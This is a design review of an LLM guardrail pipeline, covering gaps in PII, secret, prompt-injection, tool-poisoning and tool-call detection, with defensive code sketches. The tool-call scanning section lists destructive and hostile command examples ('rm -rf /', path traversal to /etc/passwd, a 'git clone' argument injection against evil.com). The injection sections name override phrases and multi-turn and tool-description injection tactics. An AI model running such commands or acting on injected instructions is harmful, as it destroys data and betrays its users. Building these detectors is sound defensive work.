Pipeline Step Depth Analysis

End-to-end review of every pipeline step: what’s strong, what’s missing, and what the competition does better. Based on research into LLM Guard, NeMo Guardrails, Rebuff, Vigil, Lakera Guard, Pangea, Arthur Shield, Giskard, TruffleHog, GitLeaks, OWASP LLM Top 10 (2025), and real-world red team reports.

Before the LLM

1. `validate_input`. Input Validation

Current: Null bytes, UTF-8, garbage ratio, JSON depth, session repair (orphan tool results, empty messages, role merging).

Strengths: Session repair is unique; no competitor does this. It prevents real API errors from broken message arrays. The JSON depth limit prevents stack overflow attacks.

Gaps & Recommendations:

Missing: Image/multimodal payload validation. GPT-4o and Claude accept images. Steganographic payloads and oversized images are a real attack vector. Add MIME type validation, image dimension/size limits, and optional image content scanning.
Missing: Token count estimation. Current check is byte-based. A 500KB input can run to well over 100K tokens, and what it costs depends on the model’s per-token price, which a byte limit cannot see. Add a fast tiktoken-based token estimate and a max_tokens config option. LLM Guard does this.
Missing: Language detection. If the org only operates in EN/FR/DE, reject Cyrillic/CJK input that’s likely an evasion attempt. Pair with injection detection (multilingual attacks bypass EN-only detectors).
Missing: Schema validation for tool params. Validate tool call arguments against the declared JSON schema before forwarding. Catches malformed tool calls early. Guardrails AI makes this a core feature.
Improvement: Content-type validation. Tool params could contain serialized objects (pickle, YAML load). Reject non-JSON content types.

Priority: HIGH (multimodal validation is the biggest blind spot as vision models become default)
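
The MIME and size checks recommended above could look roughly like the sketch below. It sniffs the leading magic bytes rather than trusting the declared type. The names `validate_image`, `sniff_mime`, and `max_image_bytes` are hypothetical, and the signature table is a deliberately small subset; dimension limits and content scanning would need an image library and are not shown.

```python
import base64
from typing import Optional

# Magic-byte signatures for the image types we choose to accept (illustrative subset).
IMAGE_SIGNATURES = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
}


def sniff_mime(data: bytes) -> Optional[str]:
    """Return the MIME type implied by the leading bytes, or None if unknown."""
    for mime, magic in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return mime
    return None


def validate_image(declared_mime: str, b64_payload: str,
                   max_image_bytes: int = 5_000_000) -> list[str]:
    """Return a list of problems; an empty list means the payload passed."""
    try:
        data = base64.b64decode(b64_payload, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return ["payload is not valid base64"]

    problems = []
    if len(data) > max_image_bytes:
        problems.append(f"image is {len(data)} bytes, limit is {max_image_bytes}")

    actual = sniff_mime(data)
    if actual is None:
        problems.append("unrecognized image format")
    elif actual != declared_mime:
        problems.append(f"declared {declared_mime} but content is {actual}")
    return problems
```

Returning a list of problems rather than raising lets the step decide whether to block, warn, or log, in line with how the other detectors report findings.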

2. `rate_limit`. Rate Limiting

Current: Fixed window, sliding window, token-based, per-user, warning threshold.

Strengths: Three strategies is comprehensive. Sliding window prevents burst abuse at boundaries. Warning threshold is good UX.

Gaps & Recommendations:

Missing: Adaptive rate limiting. If injection attempts are detected, automatically tighten the rate limit for that agent/user. Lakera Guard does this and calls it “threat-responsive throttling.”
Missing: Cost-based rate limiting. Limit by estimated cost per window (not just tokens). At list prices, a GPT-4o call costs more than ten times as much as GPT-4o-mini for the same tokens.
Missing: Concurrency limits. Rate limits control calls/window but not simultaneous inflight calls. An agent sending 100 parallel requests stays under rate limits but DoSes the LLM provider. Add max_concurrent.
Improvement: Exponential backoff headers. Return Retry-After with exponential backoff in 429 responses. Standard HTTP but currently missing.

Priority: MEDIUM (adaptive + concurrency most impactful)
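
A minimal sketch of the max_concurrent idea and the Retry-After backoff, assuming in-process state and one counter per agent key. `ConcurrencyLimiter` and `retry_after_seconds` are hypothetical names; a multi-worker deployment would need shared state (Redis or similar), which this does not cover.

```python
import threading


class ConcurrencyLimiter:
    """Caps simultaneous in-flight calls per key (for example, per agent)."""

    def __init__(self, max_concurrent: int):
        self.max_concurrent = max_concurrent
        self._inflight = {}
        self._lock = threading.Lock()

    def try_acquire(self, key: str) -> bool:
        """Reserve a slot; returns False when the key is already at its cap."""
        with self._lock:
            current = self._inflight.get(key, 0)
            if current >= self.max_concurrent:
                return False
            self._inflight[key] = current + 1
            return True

    def release(self, key: str) -> None:
        """Free a slot once the call has finished (success or failure)."""
        with self._lock:
            current = self._inflight.get(key, 0)
            if current <= 1:
                self._inflight.pop(key, None)
            else:
                self._inflight[key] = current - 1


def retry_after_seconds(consecutive_rejections: int,
                        base: float = 1.0, cap: float = 60.0) -> int:
    """Exponential backoff for a Retry-After header: base * 2^(n-1), capped."""
    delay = min(cap, base * 2 ** max(0, consecutive_rejections - 1))
    return int(delay)
```

The caller is expected to pair every successful `try_acquire` with a `release` in a `finally` block so that failed calls do not leak slots.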

3. `budget_enforcement`. Budget Control

Current: Monthly USD, monthly tokens, hourly tokens. Reads from pipeline state repo.

Strengths: Three limit types cover most needs.

Gaps & Recommendations:

Missing: Per-model budget splits. “Max $50/mo on GPT-4o, unlimited GPT-4o-mini.” Right now a single budget covers all models. CISOs want granular cost control.
Missing: Budget alerts at thresholds. Fire a webhook at 50%, 80%, 90% of budget. Currently only blocks at 100%.
Missing: Daily/weekly budgets. Monthly is too coarse for startups iterating fast. Daily limits catch runaway agents faster.
Missing: Budget rollover/carry-forward. Some enterprises want unused budget to carry over.
Improvement: Real-time cost estimation pre-call. Before calling the LLM, estimate the cost of this specific call and check if it would exceed the budget. Prevents “last call blows the budget” scenarios.

Priority: MEDIUM (per-model splits and alerts are most requested by CISOs)
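
The pre-call estimate and threshold alerts could be combined along these lines. This is a sketch under assumptions: `ModelBudget`, `estimate_cost_usd`, `check_call`, and `record_call` are hypothetical names, prices are passed in by the caller rather than looked up, and the estimate is a worst case that assumes the model uses its full output allowance.

```python
from dataclasses import dataclass, field


@dataclass
class ModelBudget:
    limit_usd: float
    spent_usd: float = 0.0
    alert_thresholds: tuple = (0.5, 0.8, 0.9)
    fired: set = field(default_factory=set)  # thresholds already alerted on


def estimate_cost_usd(input_tokens: int, max_output_tokens: int,
                      usd_per_1k_in: float, usd_per_1k_out: float) -> float:
    """Worst-case cost of one call: full output allowance is assumed."""
    return (input_tokens / 1000 * usd_per_1k_in
            + max_output_tokens / 1000 * usd_per_1k_out)


def check_call(budget: ModelBudget, estimated_usd: float):
    """Return (allowed, newly crossed alert thresholds) for a prospective call."""
    projected = budget.spent_usd + estimated_usd
    if projected > budget.limit_usd:
        return False, []
    crossed = [t for t in budget.alert_thresholds
               if projected >= t * budget.limit_usd and t not in budget.fired]
    return True, crossed


def record_call(budget: ModelBudget, actual_usd: float, crossed: list) -> None:
    """Book the real cost and remember which alerts have been sent."""
    budget.spent_usd += actual_usd
    budget.fired.update(crossed)
```

Keeping one `ModelBudget` per model name gives the per-model split; a daily or weekly budget is the same structure with a different reset schedule.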

4. `detect_pii`. PII Detection

Current: Presidio (40+ entity types, NER, context scoring) + 13 regex patterns. Zero-width char stripping for evasion resistance. Custom patterns. Scanner cache integration.

Strengths: Presidio is the gold standard for structured PII. Regex fallback is smart for minimal deployments. Zero-width stripping is good.

Gaps & Recommendations:

Missing: Multi-language PII. Presidio’s default is EN-only. European CISOs need FR/DE/NL/ES PII patterns (BSN, NISS, Personalausweis, etc.). LLM Guard supports 50+ languages via custom recognizers. Add EU-specific recognizers for Belgian national number (Rijksregisternummer), German Steuer-ID, French NIR, Dutch BSN.
Missing: Context-aware false positive reduction. “The account number is 1234567890” should flag, but “page 1234567890 of the document” shouldn’t. Presidio’s context scoring helps but needs custom enhancers for business contexts.
Missing: PII in structured data. If tool params contain JSON with nested PII (e.g., a customer record), the flat text extraction misses it. Add recursive JSON PII scanning.
Missing: Name detection without Presidio. Regex can’t detect names. When Presidio isn’t installed, names go undetected. Add a lightweight name dictionary (top 10K names across EU languages) as a fallback.
Improvement: Configurable entity sensitivity. Not all PII is equal. A first name is less sensitive than a credit card. Allow per-entity-type on_detection overrides: "CREDIT_CARD": "block", "PERSON": "notify".

Priority: HIGH (EU multi-language PII is a must-have for European positioning)
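
As an illustration of an EU-specific recognizer combined with recursive JSON scanning, the sketch below validates Dutch BSN candidates with the standard 11-test (weights 9 down to 2, then -1) and walks nested tool params. It is plain Python, not a Presidio recognizer; `find_bsn` and `walk_strings` are hypothetical helper names.

```python
import re
from typing import Any, Iterator

BSN_CANDIDATE = re.compile(r"\b\d{9}\b")
BSN_WEIGHTS = (9, 8, 7, 6, 5, 4, 3, 2, -1)


def is_valid_bsn(digits: str) -> bool:
    """Dutch BSN 11-test: the weighted digit sum must be divisible by 11."""
    if len(digits) != 9 or not digits.isdigit() or digits == "000000000":
        return False
    total = sum(int(d) * w for d, w in zip(digits, BSN_WEIGHTS))
    return total % 11 == 0


def walk_strings(node: Any, path: str = "$") -> Iterator[tuple[str, str]]:
    """Yield (json_path, string_value) for every string in a nested structure."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk_strings(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def find_bsn(params: Any) -> list[tuple[str, str]]:
    """Return (json_path, bsn) for each checksum-valid BSN in the params."""
    hits = []
    for path, text in walk_strings(params):
        for match in BSN_CANDIDATE.finditer(text):
            if is_valid_bsn(match.group()):
                hits.append((path, match.group()))
    return hits
```

The checksum is what keeps the false positive rate manageable: a bare nine-digit regex would flag page numbers and order IDs, while the 11-test rejects roughly ten out of eleven random nine-digit strings.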

5. `detect_secrets`. Secret Detection

Current: 74 regex patterns (AWS, GCP, Azure, OpenAI, GitHub, Stripe, etc.), Shannon entropy, base64 decoding, line-joining, comment-stripping, reversal detection. Custom patterns.

Strengths: Pattern database is competitive with TruffleHog/GitLeaks. Evasion detection (base64, line-joining, comments, reversal) is deeper than most. Entropy detection catches unknown formats.

Gaps & Recommendations:

Missing: Verification/validation. TruffleHog’s killer feature: it actually validates detected secrets (calls AWS STS, checks GitHub token scopes). A verified secret is 100x more actionable than a regex match. Add optional async verification for top providers (AWS, GitHub, Slack, Stripe).
Missing: Git diff / commit context. When the input contains code diffs or commit messages, the secret might be in a - line (removed) vs + line (added). Only + lines matter. Add diff-aware scanning.
Missing: Allowlisting. Known-safe patterns (test keys, example tokens, documentation patterns) cause noise. Add allow_patterns config. TruffleHog and GitLeaks both have this.
Missing: Secret rotation recommendations. When a secret is detected, tell the user what to do: “Rotate this AWS key at console.aws.amazon.com/iam.” Pangea does this.
Improvement: Reduce false positives on JWTs. The jwt pattern matches any JWT, but JWTs are designed to be sent, so on their own they’re not secrets. Flag JWTs only when they appear in unexpected contexts (user message, not auth header). The current false positive rate is high.
Missing: HashiCorp Vault transit tokens, Doppler tokens, 1Password service accounts, Infisical tokens. Growing secret managers have their own token formats.

Priority: HIGH (verification transforms this from “maybe a secret” to “confirmed leaked credential”)
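
Diff-aware scanning and allowlisting are simple to prototype. The sketch below only inspects added lines of a unified diff and skips matches covered by an allow pattern. A single AWS access key ID regex stands in for the real pattern database, and `scan_added_lines` and the shape of `allow_patterns` are assumptions, not the existing config.

```python
import re

# One illustrative pattern; the real step has a much larger pattern database.
AWS_ACCESS_KEY = re.compile(r"\bAKIA[0-9A-Z]{16}\b")


def scan_added_lines(diff_text: str, allow_patterns=()) -> list[tuple[int, str]]:
    """Return (line_number, secret) for secrets found on '+' lines only."""
    allow = [re.compile(p) for p in allow_patterns]
    findings = []
    for line_no, line in enumerate(diff_text.splitlines(), start=1):
        # Skip removed/context lines and the '+++ b/file' header.
        # Caveat: an added line whose own content starts with '++' is skipped too.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for match in AWS_ACCESS_KEY.finditer(line[1:]):
            secret = match.group()
            if any(a.search(secret) for a in allow):
                continue  # known-safe example or test key
            findings.append((line_no, secret))
    return findings
```

For example, passing `allow_patterns=[r"EXAMPLE$"]` suppresses documentation-style keys that end in EXAMPLE while still reporting a freshly added key on the line above it.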

6. `detect_infra`. Infrastructure Data

Current: 10 patterns, including internal hostname, private IP, DB connection string, env server, infra config, infra service, K8s config, Docker registry, and custom domain.

Strengths: Catches the common categories.

Gaps & Recommendations:

Missing: Cloud-specific resource identifiers. AWS ARNs (arn:aws:*), GCP resource names (projects/*/locations/*), Azure resource IDs (/subscriptions/*/resourceGroups/*). These leak cloud topology.
Missing: Internal URL detection. URLs with .internal, .local, .corp, .lan TLDs, or non-public DNS (e.g., api.staging.acme.internal).
Missing: CI/CD identifiers. GitHub Actions workflow URLs, Jenkins build URLs, GitLab CI pipeline references. These reveal deployment infrastructure.
Missing: Kubernetes secrets in plain text. kubectl get secret -o yaml output contains base64-encoded secrets that aren’t caught by detect_secrets because they’re in a YAML context.
Improvement: Configurable internal domain patterns. Every org has different internal domains. Add internal_domains: ["*.acme.internal", "*.corp.acme.com"] config.

Priority: MEDIUM (cloud ARNs and internal URLs are the most commonly leaked)
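
A sketch of the two highest-value additions: AWS ARN detection and configurable internal domains. The ARN regex follows the documented `arn:partition:service:region:account-id:resource` layout but is intentionally loose, and the hostname regex is a rough approximation. `find_cloud_ids` and `find_internal_hosts` are hypothetical names; `internal_domains` mirrors the config key proposed above.

```python
import re
from fnmatch import fnmatchcase

# arn:partition:service:region:account-id:resource (region/account may be empty)
ARN = re.compile(r"\barn:aws[a-z-]*:[a-z0-9-]+:[a-z0-9-]*:\d{0,12}:[^\s\"']+")
HOSTNAME = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def find_cloud_ids(text: str) -> list[str]:
    """Return every substring that looks like an AWS ARN."""
    return ARN.findall(text)


def find_internal_hosts(text: str, internal_domains: list[str]) -> list[str]:
    """Return hostnames matching any configured glob such as '*.acme.internal'."""
    hits = []
    for match in HOSTNAME.finditer(text):
        host = match.group().lower()
        if any(fnmatchcase(host, pattern.lower()) for pattern in internal_domains):
            hits.append(host)
    return hits
```

GCP resource names and Azure resource IDs would follow the same shape with their own regexes.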

7. `detect_business`. Business Data

Current: 9 patterns, including financial figure, large amount, board decision, strategic info, competitive intel, customer data, HR personnel, and legal matter.

Strengths: Covers the major categories. This step is unique; no competitor does this.

Gaps & Recommendations:

Missing: Industry-specific patterns. Healthcare (diagnosis codes, drug names, patient IDs), legal (case numbers, court references), financial (SWIFT codes, ISIN numbers, CUSIPs). Configurable per industry.
Missing: Context-aware matching. “$50M” in a financial report discussion is expected; in a casual question it’s a leak. Weight by surrounding context.
Missing: Code names / project names. Many orgs use code names for M&A targets, products, etc. Add configurable sensitive_terms: ["Project Phoenix", "Operation Sunrise"].
Missing: NDA/confidentiality markers. Text containing “CONFIDENTIAL”, “PRIVILEGED”, “ATTORNEY-CLIENT” should auto-escalate classification.
Improvement: Revenue/valuation number extraction. Current patterns are simple regex. Use numeric extraction with currency awareness to catch “twelve million dollars” and “€2.5M revenue.”

Priority: MEDIUM (NDA markers and custom terms are quick wins)

8. `detect_unicode`. Unicode / Homoglyph

Current: 85+ dangerous codepoints, 85+ confusable mappings, suspicious categories, combining mark floods, mixed-script detection, zero-width chars, bidi overrides.

Strengths: Very thorough. Mixed-script word detection is rare among competitors. Combining mark flood detection is good.

Gaps & Recommendations:

Missing: Punycode/IDN homoglyph detection. Internationalized domain names can contain homoglyphs (аpple.com with Cyrillic а). Detect Punycode domains in URLs.
Missing: Invisible character normalization. Instead of just detecting zero-width chars, offer a normalization mode that strips them and continues. Useful when blocking is too aggressive (accessibility tools insert zero-width chars).
Improvement: Configurable script allowlists. A Japanese org expects CJK; a European org expects Latin+Cyrillic. allowed_scripts: ["Latin", "Common"] would reduce FPs.

Priority: LOW (current implementation is already strong)
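
Punycode homoglyph detection can reuse the mixed-script idea the step already has. The sketch below decodes `xn--` labels with Python's built-in `punycode` codec and flags labels that mix scripts. Script detection here is a rough approximation based on the first word of each character's Unicode name; `suspicious_labels` is a hypothetical name.

```python
import unicodedata
from urllib.parse import urlsplit


def scripts_in(label: str) -> set[str]:
    """Approximate each letter's script by the first word of its Unicode name."""
    found = set()
    for ch in label:
        if ch.isalpha():
            found.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return found


def decode_label(label: str) -> str:
    """Decode an IDN 'xn--' label to Unicode; other labels pass through."""
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def suspicious_labels(url: str) -> list[str]:
    """Return hostname labels that mix scripts (e.g. Cyrillic inside Latin)."""
    host = urlsplit(url).hostname or ""
    flagged = []
    for label in host.split("."):
        try:
            decoded = decode_label(label)
        except UnicodeError:
            flagged.append(label)  # undecodable Punycode is itself suspicious
            continue
        if len(scripts_in(decoded)) > 1:
            flagged.append(decoded)
    return flagged
```

A label written entirely in one non-Latin script is not flagged by this check, so it complements a confusables table and an allowed_scripts list rather than replacing them.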

9. `detect_injection`. Prompt Injection

Current: 87 patterns across 7 categories (structural, behavioral, jailbreaks, obfuscation, indirect, multilingual, metaphorical). Base64 decoding, leetspeak normalization, compound scoring. Tool result scanning. Custom patterns.

Strengths: Deepest regex-based injection detector I’ve seen. Multilingual coverage (10 languages), metaphorical bypass detection, and indirect injection from tool outputs are all rare. Compound scoring for weak signals is smart.

Gaps & Recommendations:

Missing: ML-based classifier. Regex catches known patterns but misses novel attacks. Rebuff layers heuristics with an LLM-based detector and a vector store of past attacks. Lakera Guard’s core is an ML model. Add an optional lightweight classifier (DistilBERT fine-tuned on injection datasets) as a second opinion alongside regex. Run it only when regex score is ambiguous (0.3-0.7).
Missing: Perplexity-based detection. Obfuscated and machine-generated attacks (adversarial suffixes, for example) tend to have high perplexity (unusual token sequences). NeMo Guardrails ships perplexity-based jailbreak heuristics. A fast perplexity estimate using a small model could catch attacks that don’t match any pattern.
Missing: Prompt/response boundary enforcement. Ensure the LLM’s system prompt separator hasn’t been breached. NeMo Guardrails enforces strict message boundaries.
Missing: Canary token injection. Inject a unique canary into the system prompt; if it appears in the output, the system prompt was leaked. Lakera and Arthur Shield use this technique.
Missing: Multi-turn injection tracking. A slow injection spread across 5 turns (each individually benign) isn’t caught. Track injection scores across the session and alert on cumulative risk.
Missing: Image-based injection. Text rendered in images bypasses all text-based detection. As vision models become standard, OCR-based injection scanning is needed.
Improvement: Adversarial robustness testing. Run the HackAPrompt and Gandalf datasets as a CI benchmark. Track detection rate over time. Giskard provides this as a testing framework.

Priority: CRITICAL (ML classifier is the single biggest improvement; it catches novel attacks regex never will)
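
Two of the cheaper items above, canary tokens and multi-turn tracking, can be sketched without any ML dependency. The decayed running sum below is one possible way to accumulate per-turn scores; the decay factor and alert threshold are illustrative values, and `SessionRisk`, `make_canary`, and `canary_leaked` are hypothetical names.

```python
import secrets


def make_canary() -> str:
    """Random marker to embed in the system prompt."""
    return f"canary-{secrets.token_hex(8)}"


def canary_leaked(canary: str, output: str) -> bool:
    """True if the model output reproduces the marker verbatim."""
    return canary in output


class SessionRisk:
    """Decayed running sum of per-turn injection scores for one session."""

    def __init__(self, decay: float = 0.8, alert_at: float = 1.0):
        self.decay = decay
        self.alert_at = alert_at
        self.total = 0.0

    def add_turn(self, score: float) -> bool:
        """Fold in this turn's score; return True once cumulative risk alerts."""
        self.total = self.total * self.decay + score
        return self.total >= self.alert_at
```

With these defaults, five consecutive turns scoring 0.3 each (all individually below a typical block threshold) accumulate to roughly 1.008 and trigger the alert on the fifth turn, while a single 0.3 followed by clean turns decays away. A verbatim canary check misses paraphrased or encoded leaks, so it is a signal rather than a guarantee.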

10. `detect_escalation`. Privilege Escalation

Current: 4-stage model (recon → access → exfil → priv-esc), cross-turn tracking, context-aware scoring, keyword combinations.

Strengths: Multi-stage model is more sophisticated than simple keyword matching. Context awareness reduces FPs.

Gaps & Recommendations:

Missing: Behavioral baseline. What’s “normal” for this agent? An admin agent asking for user lists is normal; a customer support agent doing it is suspicious. Add per-agent behavioral profiles.
Missing: Semantic similarity to known attack chains. Use embedding similarity against a database of known escalation chains (for example MITRE ATLAS, the ATT&CK-style knowledge base for AI systems).
Improvement: Integration with tool permissions. If the agent asks about tools it doesn’t have permission to use, that’s a stronger recon signal than generic questions.

Priority: LOW (current implementation is adequate for most use cases)

11. `detect_tool_poison`. Tool Poisoning

Current: 11 patterns for injection in tool descriptions (ignore instructions, override system, act as, do not tell, exfiltration URLs, priority manipulation, hidden instructions).

Strengths: Catches the known MCP tool poisoning attacks.

Gaps & Recommendations:

Missing: Tool schema validation. Verify tool definitions match an expected schema. An attacker could add extra parameters not in the spec that carry injection payloads.
Missing: Tool definition diffing. If a tool’s description changed since last seen, flag it. Supply chain attacks modify tool definitions gradually.
Missing: URL/domain reputation check. Tool descriptions containing URLs to unknown/suspicious domains should be flagged. Use a domain reputation API (VirusTotal, URLhaus).
Missing: Excessive instruction detection. Tool descriptions longer than N chars or containing unusual formatting (multiple paragraphs of “IMPORTANT” instructions) are suspicious.
Improvement: Hash-based tool integrity. Store a hash of each tool’s definition at registration. If it changes at runtime, alert. This catches dynamic tool poisoning via compromised MCP servers.

Priority: HIGH (supply chain attacks via MCP are a growing threat; tool integrity verification is essential)
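
Hash-based tool integrity is a small amount of code. The sketch below fingerprints a tool definition as SHA-256 over canonical JSON (sorted keys, fixed separators) so that key order does not cause false alarms. `ToolRegistry` and its in-memory store are assumptions; a real deployment would persist fingerprints alongside the pipeline state.

```python
import hashlib
import json


def tool_fingerprint(tool_def: dict) -> str:
    """SHA-256 over a canonical JSON encoding of the tool definition."""
    canonical = json.dumps(tool_def, sort_keys=True,
                           separators=(",", ":"), ensure_ascii=False)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


class ToolRegistry:
    """Remembers each tool's fingerprint from registration time."""

    def __init__(self):
        self._known = {}

    def register(self, name: str, tool_def: dict) -> None:
        self._known[name] = tool_fingerprint(tool_def)

    def verify(self, name: str, tool_def: dict) -> str:
        """Return 'ok', 'changed', or 'unknown' for a definition seen at runtime."""
        expected = self._known.get(name)
        if expected is None:
            return "unknown"
        return "ok" if tool_fingerprint(tool_def) == expected else "changed"
```

A "changed" result is the trigger for the diffing recommendation: store the previous definition as well as its hash if the alert should show what was modified.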

12. `classify_data`. Data Classification

Current: 4-level classification (PUBLIC → INTERNAL → CONFIDENTIAL → RESTRICTED). Aggregates all detection findings. Optional LLM semantic classifier. LLM can only escalate, never downgrade.

Strengths: Deterministic classification from regex findings + optional LLM escalation is the right architecture. “Can only escalate” is a good security principle.

Gaps & Recommendations:

Missing: Org-specific classification rules. “Any mention of Project X is RESTRICTED.” “All customer IDs are CONFIDENTIAL.” Allow CISO-defined rules beyond the built-in heuristics.
Missing: Data classification labels/tags. Beyond the 4 levels, support custom tags: “GDPR_PERSONAL_DATA”, “HIPAA_PHI”, “SOX_FINANCIAL”. This enables regulatory-specific routing.
Improvement: Confidence scoring. Return a confidence level with the classification. “CONFIDENTIAL (95%)” vs “CONFIDENTIAL (62%).” Low confidence triggers the LLM classifier automatically.

Priority: MEDIUM (custom rules and regulatory tags most valuable)
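
Org-specific rules and regulatory tags fit naturally into the existing "escalate only" design. In the sketch below every input can raise the level and none can lower it. The rule format (`term`, `level`, `tags`) is a hypothetical config shape, and matching is a plain case-insensitive substring check.

```python
from enum import IntEnum
from typing import Optional


class Level(IntEnum):
    PUBLIC = 0
    INTERNAL = 1
    CONFIDENTIAL = 2
    RESTRICTED = 3


def classify(text: str, base_level: Level, rules: list,
             llm_level: Optional[Level] = None):
    """Combine detector, CISO-rule, and LLM levels; the result never drops."""
    level = base_level
    tags = set()
    lowered = text.lower()
    for rule in rules:
        if rule["term"].lower() in lowered:
            level = max(level, rule["level"])
            tags.update(rule.get("tags", ()))
    if llm_level is not None:
        level = max(level, llm_level)  # the LLM may escalate, never downgrade
    return level, tags
```

Because `max` is the only combining operator, the order in which rules and the LLM verdict are applied does not affect the outcome.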

The Call

13. `call_llm`. LLM Call

Current: Timeout, fallback model, circuit breaker with error classification, cooldown with retry-after.

Strengths: Circuit breaker with error classification is production-grade. Fallback model prevents outages.

Gaps & Recommendations:

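Missing: Request/response logging for compliance. Log the full request and response (with PII redacted) for audit. GDPR Article 30 requires controllers to keep records of processing activities, and redacted request logs are a practical way to back those records.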
Missing: Model version pinning. LLM providers update models silently. A pinned version (gpt-4o-2024-11-20) prevents surprise behavior changes. Add pin_version config.
Missing: Response validation. Check that the response is well-formed (valid JSON for function calls, non-empty content). Malformed responses should retry, not propagate.
Missing: Streaming support. Currently blocks on full response. Streaming would reduce time-to-first-token. More complex to scan but important for UX.

Priority: MEDIUM (streaming is the most impactful for developer experience)

14. `call_tool`. Tool Call

Current: Timeout, response size limit, error redaction.

Strengths: Good basics.

Gaps & Recommendations:

Missing: Sandboxed execution. Tool calls should execute in a sandboxed environment (container, WASM, seccomp). Currently relies on the tool itself being safe.
Missing: Network isolation. Tool calls shouldn’t be able to reach arbitrary endpoints. Add configurable network policies (allow/deny lists for outbound connections).
Missing: Resource limits. CPU time, memory, disk I/O limits for tool execution. Prevents resource exhaustion attacks.
Missing: Output sanitization. Tool output could contain HTML, JavaScript, or other injection payloads that flow back to the LLM. Sanitize before returning.

Priority: HIGH (sandboxing is the #1 missing capability for agentic security)

15. `tool_permissions` / `tool_constraints` / `user_tool_scopes`

Current: Per-tool allow/block, per-operation permissions, parameter validation (string patterns, numeric ranges, length, cross-parameter), user-level scoping.

Strengths: The three-layer model (permissions → constraints → scopes) is more granular than any competitor.

Gaps & Recommendations:

Missing: Time-based permissions. “Tool X only allowed during business hours.” “Emergency access to production database for 2 hours.” Temporal access control is standard in enterprise IAM.
Missing: Approval workflows. “Tool X requires manager approval before execution.” For high-risk operations, add a human-in-the-loop step.
Missing: Tool call rate limiting. Separate from the global rate limit. “Max 10 database queries per minute” prevents a stuck agent from hammering a database.
Improvement: Permission inheritance. Group tools into categories with shared permissions. Currently each tool is configured individually.

Priority: MEDIUM (time-based permissions and approval workflows most requested)
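
Both temporal examples above reduce to simple datetime comparisons. This is a sketch: `within_business_hours` and `TemporaryGrant` are hypothetical names, business hours are assumed to be Monday to Friday 09:00-17:00 in whatever timezone the caller's `now` carries, and holidays are ignored.

```python
from datetime import datetime, time, timedelta


def within_business_hours(now: datetime,
                          start: time = time(9, 0),
                          end: time = time(17, 0)) -> bool:
    """True on weekdays between start (inclusive) and end (exclusive)."""
    return now.weekday() < 5 and start <= now.time() < end


class TemporaryGrant:
    """Emergency access to one tool that expires on its own."""

    def __init__(self, tool: str, granted_at: datetime, duration: timedelta):
        self.tool = tool
        self.granted_at = granted_at
        self.expires_at = granted_at + duration

    def is_active(self, now: datetime) -> bool:
        return self.granted_at <= now < self.expires_at
```

Passing `now` in explicitly, instead of calling `datetime.now()` inside, keeps the check deterministic in tests and lets the pipeline use one clock reading per request.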

16. `scan_tool_calls`. Tool Call Scanning

Current: 4 regex patterns, deny command/path lists, fnmatch for path patterns, shell argument parsing.

Strengths: Shell argument parsing with shlex is better than naive string matching.

Gaps & Recommendations:

Missing: Semantic command analysis. rm -rf / is caught, but find / -delete or python -c "import shutil; shutil.rmtree('/')" aren’t. Need a broader dangerous operation database.
Missing: File path normalization. ../../etc/passwd, /var/../etc/passwd, symlink following. Normalize paths before matching deny patterns.
Missing: Argument injection detection. git clone https://evil.com -- --upload-pack="evil". Detect double-dash argument injection.
Missing: Command chaining detection. echo safe && rm -rf / or echo safe; rm -rf /. Parse command chains, not just the first command.
Improvement: Integration with detect_code_exec. Currently these are separate. Code execution detection should feed into tool call scanning for a unified view.

Priority: HIGH (command chaining and path traversal are common bypasses)
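
Command chaining and path normalization can be layered on the shlex parsing the step already uses. The sketch below splits on `;`, `|`, and `&` runs via `shlex`'s `punctuation_chars` option, then normalizes each non-flag argument against an assumed working directory before matching deny patterns. The deny lists and `scan_command` are illustrative. Symlinks are not resolved (that needs the real filesystem), and a quoted `";"` is also treated as a separator, which errs on the side of over-reporting.

```python
import posixpath
import shlex
from fnmatch import fnmatchcase

CHAIN_CHARS = ";|&"
DENY_COMMANDS = {"rm", "mkfs", "dd"}   # illustrative
DENY_PATHS = ["/etc/*", "/root/*"]     # illustrative


def split_chain(command: str) -> list[list[str]]:
    """Split 'a && b; c | d' into one argv list per sub-command."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=CHAIN_CHARS)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if set(token) <= set(CHAIN_CHARS):  # '&&', '||', ';', '|', '&'
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def normalize_path(path: str, cwd: str) -> str:
    """Collapse '..' and '.' segments relative to cwd (no symlink resolution)."""
    return posixpath.normpath(posixpath.join(cwd, path))


def scan_command(command: str, cwd: str = "/home/agent") -> list[str]:
    """Check every sub-command in the chain, not just the first one."""
    findings = []
    for argv in split_chain(command):
        if posixpath.basename(argv[0]) in DENY_COMMANDS:
            findings.append(f"denied command: {argv[0]}")
        for arg in argv[1:]:
            if arg.startswith("-"):
                continue  # flags are not paths
            resolved = normalize_path(arg, cwd)
            if any(fnmatchcase(resolved, pat) for pat in DENY_PATHS):
                findings.append(f"denied path: {resolved}")
    return findings
```

This does not address interpreter one-liners such as the `python -c` example above; those still need the broader dangerous-operation database.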

After the LLM

17. `scan_output`. Output Scan + DLP

Current: PII, secrets, infra, business data detection on response. Redaction of PII, infra, business data. Stack trace stripping. Sensitive pattern removal (paths, internal URLs, private keys). LLM safety judge option. Scanner cache integration.

Strengths: Full DLP pipeline is unique. Stack trace stripping prevents information disclosure. LLM judge as optional second opinion is good architecture.

Gaps & Recommendations:

Missing: Hallucination detection. If the LLM generates a plausible-looking but fake API key, phone number, or address, it could cause downstream issues. Cross-reference generated data against the input to detect fabrication.
Missing: Toxicity/bias detection. OWASP LLM Top 10 includes harmful output. Add content safety scoring (toxicity, bias, adult content). LLM Guard has multiple output content validators.
